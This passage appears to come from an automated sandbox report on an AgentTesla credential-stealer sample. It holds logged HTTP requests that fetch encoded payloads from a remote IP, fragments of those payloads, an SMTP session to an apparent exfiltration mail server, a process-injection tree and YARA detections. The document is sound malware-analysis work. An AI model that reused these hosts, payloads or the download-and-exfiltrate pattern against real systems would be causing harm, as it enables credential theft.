                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%/8~|b&1>>0+75;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~YpLw^vjh.,f^AKiLE\GXEKXvFQ^y^UKWHU[Hss0>*/*$9"*-oc'>??:*4)2:+oSS%*>9pL{-1:-O?3Ew~oJoiZdObj{?##UgvZzjtiqzk/hxMbII2qDYBF[uMVZz_ZHTIRZS
                                                                                            Nov 25, 2021 15:00:19.393758059 CET713OUTGET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.421961069 CET714INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 116559
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 99 c2 a6 c2 83 c2 ae c3 bd c2 a2 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a3 c3 93 c3 a0 c3 a1 c3 b9 c2 aa c2 bd c2 bd c3 97 c3 aa c3 86 c3 b9 c3 98 c3 bd c3 b4 c3 a2 c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 9c c3 a2 c3 b2 c3 89 c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 99 c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2d 38 7e 7c 62 16 26 31 3e 19 3e 36 2b 37 38 35 3b 28 48 6c 52 26 16 01 0e 29 0e 09 1b 1f 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 76 70 1d 77 68 76 76 68 2e 2c 12 66 56 41 4d 69 42 73 5e 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 b4 c2 a1 c2 ad c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c3 9a c3 92 c3 88 c3 bc c3 a2 c2 9f c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 75 38 14 2f 0a 2f 2a 1c 24 39 22 2a 49 7f 63 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 13 2c 0f 14 09 12 1a 0b 4f 37 33 45 77 76 6f 4a 6f 6f 5e 64 79 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 45 56 5c 7a 5f 5a 48 54 49 52 5a 3e 29 c3 b3 c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 80 c2 bc c3 b1 c3 a9 c3 83 c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ac c3 be c3 94 c3 af c3 8a c3 af c3 93 c3 a2 c3 a4 c3 b9 c3 a2 c3 a9 c3 bb c2 bf c2 a3 c2 a3 c3 95 c3 a7 c3 b6 c3 bf c3 9a c3 b4 c3 bf c3 bf c3 b4 c3 a9 c3 b0 c2 8b c3 a0 c2 bf c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%-8~|b&1>>6+785;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~Yvpwhvvh.,fVAMiBs^GXEKXvFQ^y^UKWHU[Hssu8//*$9"*Icc'>??:*4)2:+oSS%*>9pL{-1:,O73EwvoJoo^dybj{?##UgvZzjtiqzk/hxMbII2qDYBF[uEV\z_ZHTIRZ>)
                                                                                            Nov 25, 2021 15:00:21.621463060 CET969OUTGET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.650618076 CET971INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 442789
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 9f c2 9c c2 94 c2 bc c3 b8 c2 90 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a6 c3 9d c3 a0 c3 a1 c3 b9 c2 ad c2 8f c2 bd c3 97 c3 a2 c3 96 c3 bc c3 98 c3 bd c3 b4 c3 ac c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 b6 c3 ba c3 98 c3 8c c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 9d c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2f 38 7e 7c 62 16 26 31 3e 19 3e 30 2b 37 1e 35 3b 28 48 6c 52 26 16 01 0e 29 0e 0d 1b 17 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 70 4c 1b 77 5e 76 6a 68 2e 2c 12 66 5e 41 4b 69 4c 45 5c 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 bc c2 a1 c2 ab c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c2 ab c2 b8 c3 be c3 bc c3 a2 c2 96 c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 16 30 3e 2a 0a 2f 2a 1c 24 39 22 2a 2d 7f 6f 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 1d 1a 0d 14 09 12 1a 2d 4f 3f 33 45 77 7e 6f 4a 6f 69 5a 64 4f 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 4d 56 5a 7a 5f 5a 48 54 49 52 5a 53 0f c3 bf c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 82 c2 ac c2 be c3 b9 c3 8f c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ab c3 bf c2 9f c3 ad c3 8a c3 ab c3 91 c3 96 c3 a4 c3 b9 c3 a2 c3 af c3 bb c2 bf c2 a3 c2 a3 c3 93 c3 b7 c3 b6 c3 bf c3 99 c3 99 c3 ba c3 aa c3 b4 c3 a9 c3 b2 c3 ba c3 ab c2 af c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%/8~|b&1>>0+75;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~YpLw^vjh.,f^AKiLE\GXEKXvFQ^y^UKWHU[Hss0>*/*$9"*-oc'>??:*4)2:+oSS%*>9pL{-1:-O?3Ew~oJoiZdObj{?##UgvZzjtiqzk/hxMbII2qDYBF[uMVZz_ZHTIRZS
                                                                                            Nov 25, 2021 15:00:21.755748034 CET1446OUTGET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783267021 CET1447INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 116559
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 99 c2 a6 c2 83 c2 ae c3 bd c2 a2 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a3 c3 93 c3 a0 c3 a1 c3 b9 c2 aa c2 bd c2 bd c3 97 c3 aa c3 86 c3 b9 c3 98 c3 bd c3 b4 c3 a2 c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 9c c3 a2 c3 b2 c3 89 c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 99 c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2d 38 7e 7c 62 16 26 31 3e 19 3e 36 2b 37 38 35 3b 28 48 6c 52 26 16 01 0e 29 0e 09 1b 1f 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 76 70 1d 77 68 76 76 68 2e 2c 12 66 56 41 4d 69 42 73 5e 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 b4 c2 a1 c2 ad c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c3 9a c3 92 c3 88 c3 bc c3 a2 c2 9f c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 75 38 14 2f 0a 2f 2a 1c 24 39 22 2a 49 7f 63 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 13 2c 0f 14 09 12 1a 0b 4f 37 33 45 77 76 6f 4a 6f 6f 5e 64 79 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 45 56 5c 7a 5f 5a 48 54 49 52 5a 3e 29 c3 b3 c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 80 c2 bc c3 b1 c3 a9 c3 83 c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ac c3 be c3 94 c3 af c3 8a c3 af c3 93 c3 a2 c3 a4 c3 b9 c3 a2 c3 a9 c3 bb c2 bf c2 a3 c2 a3 c3 95 c3 a7 c3 b6 c3 bf c3 9a c3 b4 c3 bf c3 bf c3 b4 c3 a9 c3 b0 c2 8b c3 a0 c2 bf c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%-8~|b&1>>6+785;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~Yvpwhvvh.,fVAMiBs^GXEKXvFQ^y^UKWHU[Hssu8//*$9"*Icc'>??:*4)2:+oSS%*>9pL{-1:,O73EwvoJoo^dybj{?##UgvZzjtiqzk/hxMbII2qDYBF[uEV\z_ZHTIRZ>)


                                                                                            SMTP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Nov 25, 2021 15:02:08.517106056 CET58749817209.205.200.74192.168.2.5220-odin.mk-host.com ESMTP Exim 4.94.2 #2 Thu, 25 Nov 2021 15:02:08 +0100
                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                            220 and/or bulk e-mail.
                                                                                            Nov 25, 2021 15:02:08.520540953 CET49817587192.168.2.5209.205.200.74EHLO 179605
                                                                                            Nov 25, 2021 15:02:08.621891975 CET58749817209.205.200.74192.168.2.5250-odin.mk-host.com Hello 179605 [84.17.52.63]
                                                                                            250-SIZE 52428800
                                                                                            250-8BITMIME
                                                                                            250-PIPELINING
                                                                                            250-PIPE_CONNECT
                                                                                            250-STARTTLS
                                                                                            250 HELP
                                                                                            Nov 25, 2021 15:02:08.622282982 CET49817587192.168.2.5209.205.200.74STARTTLS
                                                                                            Nov 25, 2021 15:02:08.728094101 CET58749817209.205.200.74192.168.2.5220 TLS go ahead

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            Analysis Process: W7UbgU8x18.exe PID: 5644 Parent PID: 6056

                                                                                            General

                                                                                            Start time:15:00:16
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\W7UbgU8x18.exe"
                                                                                            Imagebase:0x410000
                                                                                            File size:24064 bytes
                                                                                            MD5 hash:01F140FEA9669403791FB89C47138D69
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.258695502.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:low

                                                                                            Analysis Process: conhost.exe PID: 1768 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:17
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7ecfc0000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high

                                                                                            Analysis Process: aspnet_regbrowsers.exe PID: 408 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:19
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Imagebase:0xd70000
                                                                                            File size:45160 bytes
                                                                                            MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249733386.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250374714.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000002.512779528.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.249428029.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000002.00000000.250051529.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.518302726.0000000003231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            Reputation:moderate

                                                                                            Analysis Process: aspnet_regbrowsers.exe PID: 4896 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:21
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            Imagebase:0x280000
                                                                                            File size:45160 bytes
                                                                                            MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate

                                                                                            Analysis Process: WerFault.exe PID: 6380 Parent PID: 5644

                                                                                            General

                                                                                            Start time:15:00:28
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                                                                                            Imagebase:0x120000
                                                                                            File size:434592 bytes
                                                                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Reputation:high

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Reset < >